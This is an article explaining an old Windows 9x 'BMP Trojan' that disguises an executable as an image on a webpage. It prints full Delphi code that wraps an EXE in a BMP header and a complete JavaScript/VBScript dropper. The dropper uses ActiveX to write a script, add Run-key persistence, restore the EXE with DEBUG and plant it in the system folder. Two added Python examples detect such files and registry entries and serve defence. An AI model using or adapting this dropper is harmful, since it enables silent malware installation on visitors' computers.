Principle analysis of the image Trojan (old technique)

Source: Internet
Author: User
Tags: bmp, image

What is a BMP webpage Trojan? It differs from the earlier, notorious MIME-header Trojan. The MIME Trojan encodes an EXE file into an EML (Outlook Express mail) file with MIME, places it on a webpage, and relies on the IE and OE MIME-handling vulnerabilities to download and execute it automatically.
A BMP Trojan works differently. It disguises an EXE file as a BMP image so that IE downloads it automatically as an image, then uses a JavaScript script on the webpage to locate the client's Temporary Internet Files folder, find the downloaded BMP, and copy it to the TEMP directory. A generated script then restores the BMP to an EXE with DEBUG, registers it in the registry Run key, and it executes at the next boot. Note that this technique only works on Windows 9x; it is ineffective on Windows 2000 and XP.
It sounds complicated, so let us take it one step at a time:
1) How to turn an EXE into a BMP
You can look up the BMP file format yourself. A BMP file starts with a 54-byte header that records, among other things, the image width, height, bit depth, file size, and length of the pixel data. All we have to do is prepend a suitable BMP header to the EXE file (the values in that header must of course be consistent with the size of the EXE) and IE can be tricked into downloading the file as a BMP. We first experimented with JPG files and found that if the file header is not correct the file is not downloaded at all. The conversion code is as follows:
program exe2bmp;

uses
  Windows,
  SysUtils;

var
  len, row, col, fs: DWORD;
  buffer: array[0..255] of Char;
  fd: WIN32_FIND_DATA;
  h, hw: THandle;

begin
  if (ParamStr(1) <> '') and (ParamStr(2) <> '') then begin  // do nothing unless two parameters were given
    if FileExists(ParamStr(1)) then begin
      FindFirstFile(PChar(ParamStr(1)), fd);
      fs := fd.nFileSizeLow;
      col := 4;
      { pad the length to a multiple of 12 and pick a width (multiple of 4) that keeps the image roughly square }
      while True do begin
        if (fs mod 12) = 0 then begin
          len := fs;
        end else len := fs + 12 - (fs mod 12);
        row := len div col div 3;
        if row > col then begin
          col := col + 4;
        end else Break;
      end;
      FillChar(buffer, 256, 0);
      {BMP file header data}
      buffer[0] := 'B'; buffer[1] := 'M';
      PDWORD(@buffer[18])^ := col;        { biWidth }
      PDWORD(@buffer[22])^ := row;        { biHeight }
      PDWORD(@buffer[34])^ := len;        { biSizeImage }
      PDWORD(@buffer[2])^ := len + 54;    { bfSize }
      PDWORD(@buffer[10])^ := 54;         { bfOffBits: pixel data starts right after the header }
      PDWORD(@buffer[14])^ := 40;         { biSize }
      PWORD(@buffer[26])^ := 1;           { biPlanes }
      PWORD(@buffer[28])^ := 24;          { biBitCount }
      {Write File}
      hw := CreateFile(PChar(ParamStr(2)), GENERIC_WRITE, FILE_SHARE_READ or
        FILE_SHARE_WRITE, nil, CREATE_ALWAYS, 0, 0);
      h := CreateFile(PChar(ParamStr(1)), GENERIC_READ, FILE_SHARE_READ or
        FILE_SHARE_WRITE, nil, OPEN_EXISTING, 0, 0);
      WriteFile(hw, buffer, 54, col, nil);
      { copy the EXE in 256-byte chunks after the header }
      repeat
        ReadFile(h, buffer, 256, col, nil);
        WriteFile(hw, buffer, col, col, nil);
      until col <> 256;
      { pad up to the declared image length }
      WriteFile(hw, buffer, len - fs, col, nil);
      CloseHandle(h);
      CloseHandle(hw);
    end;
  end;
end.

The code above compiles under Delphi 4, 5 or 6 into exe2bmp.exe. Open an MS-DOS prompt and enter
    exe2bmp myexe.exe mybmp
and press Enter: the EXE named by the first parameter is written out in BMP format under the name given as the second parameter.
The next step is to put this BMP "image" on the webpage. If you open the image you will find it is nothing but a monotonous patch of colour noise; that is the form it takes on the webpage.
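The header layout described above also gives a defender everything needed to recognise such a file. The Python below is an added example, not code from the article or its author: it parses the 54-byte header at the offsets the exe2bmp program writes, checks that the declared sizes agree with the pixel geometry, and looks for an MZ/PE signature at the start of the pixel data. The samples it scans are constructed inline (the "executable" is only an MZ/PE signature skeleton, not a program), and all function names are my own. It also surfaces something the article does not mention: because exe2bmp computes the height with integer division, width × height × 3 comes out smaller than biSizeImage, so the header is internally inconsistent and the file carries bytes past the declared pixel array.

```python
"""Added example (not from the original article): detect an executable that has
been given a BMP header in the way exe2bmp does. Sample files are constructed."""
import struct
from typing import Optional

HEADER_LEN = 54  # BITMAPFILEHEADER (14 bytes) + BITMAPINFOHEADER (40 bytes)


def parse_bmp_header(data: bytes) -> dict:
    """Unpack the header fields at the offsets exe2bmp fills in; raise if not 'BM'."""
    if len(data) < HEADER_LEN or data[:2] != b"BM":
        raise ValueError("not a BMP file")
    (file_size, off_bits, dib_size, width, height,
     planes, bpp, compression, size_image) = struct.unpack_from("<I4xIIiiHHII", data, 2)
    return {"file_size": file_size, "off_bits": off_bits, "dib_size": dib_size,
            "width": width, "height": height, "planes": planes, "bpp": bpp,
            "compression": compression, "size_image": size_image}


def find_embedded_pe(data: bytes, start: int) -> Optional[dict]:
    """Return MZ/PE offsets if an executable header sits at `start`, else None."""
    if data[start:start + 2] != b"MZ" or len(data) < start + 0x40:
        return None
    e_lfanew = struct.unpack_from("<I", data, start + 0x3C)[0]
    pe_off = start + e_lfanew
    has_pe = data[pe_off:pe_off + 4] == b"PE\0\0"
    return {"mz_offset": start, "pe_offset": pe_off if has_pe else None}


def scan_bmp(data: bytes) -> dict:
    """Flag a BMP whose pixel area holds an executable or whose sizes do not add up."""
    hdr = parse_bmp_header(data)
    reasons = []
    # Rows are padded to 4 bytes; biSizeImage may legitimately be 0 for uncompressed data.
    stride = ((hdr["width"] * hdr["bpp"] + 31) // 32) * 4
    expected = stride * abs(hdr["height"])
    if hdr["size_image"] not in (0, expected):
        reasons.append(f"biSizeImage {hdr['size_image']} != stride*height {expected}")
    if hdr["file_size"] != len(data):
        reasons.append(f"bfSize {hdr['file_size']} != actual size {len(data)}")
    trailing = len(data) - (hdr["off_bits"] + expected)
    if trailing > 0:
        reasons.append(f"{trailing} bytes after the declared pixel array")
    pe = find_embedded_pe(data, hdr["off_bits"])
    if pe:
        reasons.append("pixel data starts with an MZ executable header")
    return {"suspicious": bool(reasons), "reasons": reasons, "header": hdr,
            "expected_image_size": expected, "trailing_bytes": max(trailing, 0),
            "embedded_pe": pe}


def constructed_mz_pe_skeleton(size: int = 100) -> bytes:
    """Constructed stand-in for an EXE: an MZ stub whose e_lfanew points at 'PE\\0\\0'."""
    buf = bytearray(size)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    return bytes(buf)


def wrap_like_exe2bmp(payload: bytes) -> bytes:
    """Test fixture: build the header with the same field values the article's tool computes."""
    fs = len(payload)
    length = fs if fs % 12 == 0 else fs + 12 - fs % 12
    col = 4
    while True:
        row = length // col // 3
        if row > col:
            col += 4
        else:
            break
    hdr = bytearray(HEADER_LEN)
    hdr[0:2] = b"BM"
    for off, fmt, val in ((2, "<I", length + 54), (10, "<I", 54), (14, "<I", 40),
                          (18, "<I", col), (22, "<I", row), (26, "<H", 1),
                          (28, "<H", 24), (34, "<I", length)):
        struct.pack_into(fmt, hdr, off, val)
    return bytes(hdr) + payload + bytes(length - fs)


def clean_bmp_2x2() -> bytes:
    """Constructed 2x2 24-bit black BMP for comparison (stride 8, 16 pixel bytes)."""
    hdr = bytearray(HEADER_LEN)
    hdr[0:2] = b"BM"
    for off, fmt, val in ((2, "<I", HEADER_LEN + 16), (10, "<I", 54), (14, "<I", 40),
                          (18, "<i", 2), (22, "<i", 2), (26, "<H", 1),
                          (28, "<H", 24), (34, "<I", 16)):
        struct.pack_into(fmt, hdr, off, val)
    return bytes(hdr) + bytes(16)


if __name__ == "__main__":
    for name, sample in (("wrapped", wrap_like_exe2bmp(constructed_mz_pe_skeleton())),
                         ("clean", clean_bmp_2x2())):
        verdict = scan_bmp(sample)
        print(name, "SUSPICIOUS" if verdict["suspicious"] else "ok", verdict["reasons"])
```

The MZ check alone is enough for files produced exactly as the article describes; the size-consistency checks are there because an attacker can set a real image's header and still leave the executable in the pixel area, which the trailing-bytes and biSizeImage comparisons catch independently of the signature.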

The following is the script on the web page.
document.write('');
function docsave()
{
  a = document.applets[0];
  a.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}');
  a.createInstance();
  wsh = a.GetObject();
  a.setCLSID('{0D43FE01-F093-11CF-8940-00A0C9054228}');
  a.createInstance();
  fso = a.GetObject();
  var winsys = fso.GetSpecialFolder(1);
  var vbs = winsys + '\\s.vbs';
  wsh.RegWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs', 'wscript "' + vbs + '"');
  var st = fso.CreateTextFile(vbs, true);
  st.WriteLine('Option Explicit');
  st.WriteLine('Dim FSO, WSH, CACHE, str');
  st.WriteLine('Set FSO = CreateObject("Scripting.FileSystemObject")');
  st.WriteLine('Set WSH = CreateObject("WScript.Shell")');
  st.WriteLine('CACHE = WSH.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")');
  st.WriteLine('WSH.RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")');
  st.WriteLine('WSH.RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp", "tmp.exe"');
  st.WriteLine('SearchBmpFile FSO.GetFolder(CACHE), "mybmp[1].bmp"');
  st.WriteLine('WScript.Quit()');
  st.WriteLine('Function SearchBmpFile(Folder, fname)');
  st.WriteLine('Dim SubFolder, File, Lt, tmp, winsys');
  st.WriteLine('str = FSO.GetParentFolderName(Folder) & "\\" & Folder.Name & "\\" & fname');
  st.WriteLine('If FSO.FileExists(str) Then');
  st.WriteLine('tmp = FSO.GetSpecialFolder(2) & "\\"');
  st.WriteLine('winsys = FSO.GetSpecialFolder(1) & "\\"');
  st.WriteLine('Set File = FSO.GetFile(str)');
  st.WriteLine('File.Copy(tmp & "tmp.dat")');
  st.WriteLine('File.Delete');
  st.WriteLine('Set Lt = FSO.CreateTextFile(tmp & "tmp.in")');
  st.WriteLine('Lt.WriteLine("rbx")');
  st.WriteLine('Lt.WriteLine("0")');
  st.WriteLine('Lt.WriteLine("rcx")');
  st.WriteLine('Lt.WriteLine("1000")');
  st.WriteLine('Lt.WriteLine("w136")');
  st.WriteLine('Lt.WriteLine("q")');
  st.WriteLine('Lt.Close');
  st.WriteLine('WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out", False, 6');
  st.WriteLine('On Error Resume Next');
  st.WriteLine('FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")');
  st.WriteLine('FSO.GetFile(tmp & "tmp.dat").Delete');
  st.WriteLine('FSO.GetFile(tmp & "tmp.in").Delete');
  st.WriteLine('FSO.GetFile(tmp & "tmp.out").Delete');
  st.WriteLine('End If');
  st.WriteLine('If Folder.SubFolders.Count <> 0 Then');
  st.WriteLine('For Each SubFolder In Folder.SubFolders');
  st.WriteLine('SearchBmpFile SubFolder, fname');
  st.WriteLine('Next');
  st.WriteLine('End If');
  st.WriteLine('End Function');
  st.Close();
}
setTimeout('docsave()', 1000);
Save the script as "js.js" and include it in the webpage:
<script src="js.js"></script>
This script writes an "s.vbs" file into the system directory of the local machine and registers it so that it runs automatically at the next boot. Its job is to locate the cached copy of the downloaded BMP (mybmp[1].bmp) in the Temporary Internet Files directory.
The main content of the "s.vbs" file is as follows:
Option Explicit
Dim FSO, WSH, CACHE, str
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WSH = CreateObject("WScript.Shell")
CACHE = WSH.RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache")
WSH.RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs")
WSH.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp", "tmp.exe"
SearchBmpFile FSO.GetFolder(CACHE), "mybmp[1].bmp"
WScript.Quit()

Function SearchBmpFile(Folder, fname)
    Dim SubFolder, File, Lt, tmp, winsys
    ' Look for the target BMP image in the Temporary Internet Files folder
    str = FSO.GetParentFolderName(Folder) & "\" & Folder.Name & "\" & fname
    If FSO.FileExists(str) Then
        tmp = FSO.GetSpecialFolder(2) & "\"
        winsys = FSO.GetSpecialFolder(1) & "\"
        Set File = FSO.GetFile(str)
        File.Copy(tmp & "tmp.dat")
        File.Delete
        ' Generate a DEBUG script
        Set Lt = FSO.CreateTextFile(tmp & "tmp.in")
        Lt.WriteLine("rbx")
        Lt.WriteLine("0")
        Lt.WriteLine("rcx")
        ' The value on the next line is hexadecimal (1000h = 4096 decimal); it must be the size of your EXE file
        Lt.WriteLine("1000")
        Lt.WriteLine("w136")
        Lt.WriteLine("q")
        Lt.Close
        WSH.Run "command /c debug " & tmp & "tmp.dat <" & tmp & "tmp.in >" & tmp & "tmp.out", False, 6
        On Error Resume Next
        FSO.GetFile(tmp & "tmp.dat").Copy(winsys & "tmp.exe")
        FSO.GetFile(tmp & "tmp.dat").Delete
        FSO.GetFile(tmp & "tmp.in").Delete
        FSO.GetFile(tmp & "tmp.out").Delete
    End If
    If Folder.SubFolders.Count <> 0 Then
        For Each SubFolder In Folder.SubFolders
            SearchBmpFile SubFolder, fname
        Next
    End If
End Function
This script finds the BMP file in the Temporary Internet Files folder and generates a DEBUG script. When DEBUG runs it, the "w136" command writes BX:CX bytes (the EXE size given to rcx) starting 54 bytes into the BMP file (DEBUG loads the file at offset 100h, so 136h is the first byte after the header) back into tmp.dat, discarding the BMP header. The remaining lines copy the restored EXE to the system directory, and it runs at the next restart. This is the basic implementation process of a BMP Trojan.
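The two registry entries the dropper leaves behind (Run\vbs pointing wscript at s.vbs in the system directory, and Run\tmp holding the bare name tmp.exe) are also the easiest artifacts for a defender to hunt. The Python below is an added example, not part of the article: it parses a constructed .reg export of the HKCU Run key and flags the indicators described above (a script host started at logon, a script file argument, a bare executable name with no path, and invocation of debug or command). The key path and the "vbs" and "tmp" values mirror what the article's script writes; the "Updater" entry and all function names are invented for illustration.

```python
"""Added example (not from the original article): review HKCU Run-key entries
for the persistence pattern this Trojan uses. The .reg fragment is constructed."""
import re

RUN_KEY = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
SCRIPT_HOSTS = {"wscript", "wscript.exe", "cscript", "cscript.exe"}
SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf")
LEGACY_TOOLS = {"debug", "debug.exe", "command", "command.com"}

# Constructed sample: the first two values are what the article's script writes,
# the third is an invented benign entry for comparison.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"vbs"="wscript \"C:\\WINDOWS\\SYSTEM\\s.vbs\""
"tmp"="tmp.exe"
"Updater"="\"C:\\Program Files\\Example\\updater.exe\" /background"
'''


def parse_reg_export(text: str) -> dict:
    """Return {key_path: {value_name: string_data}} for REG_SZ values in a .reg fragment."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
        elif current is not None and line.startswith('"') and "=" in line:
            name, _, data = line.partition("=")
            if data.startswith('"') and data.endswith('"'):
                # .reg files escape backslash and double quote with a backslash
                data = data[1:-1].replace("\\\\", "\\").replace('\\"', '"')
                keys[current][name.strip('"')] = data
    return keys


def split_command(cmd: str) -> list:
    """Split a Run-key command line into tokens, honouring double quotes."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def assess_run_value(cmd: str) -> list:
    """List the indicators found in one Run-key command; an empty list means nothing flagged."""
    tokens = split_command(cmd)
    if not tokens:
        return ["empty command"]
    exe, args = tokens[0], tokens[1:]
    base = exe.rsplit("\\", 1)[-1].lower()
    findings = []
    if base in SCRIPT_HOSTS:
        findings.append(f"script host {base} launched at logon")
    for arg in args:
        if arg.lower().endswith(SCRIPT_EXT):
            findings.append(f"runs script file {arg}")
    if "\\" not in exe and base not in SCRIPT_HOSTS:
        # "tmp.exe" with no directory is resolved through the search path at logon
        findings.append(f"bare executable name {exe} with no path, resolved through the search path")
    if base in LEGACY_TOOLS:
        findings.append(f"invokes {base}, which the dropper uses to rebuild the EXE")
    return findings


def review_run_key(reg_text: str) -> dict:
    """Map every value under the HKCU Run key to its list of findings."""
    values = parse_reg_export(reg_text).get(RUN_KEY, {})
    return {name: assess_run_value(cmd) for name, cmd in values.items()}


if __name__ == "__main__":
    for name, findings in review_run_key(SAMPLE_REG).items():
        print(f"{name}: {'; '.join(findings) if findings else 'no indicators'}")
```

On a live system the same checks apply to the HKLM Run key and to the RunOnce keys; the parser only needs a different RUN_KEY constant, and the value-level logic is unchanged.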
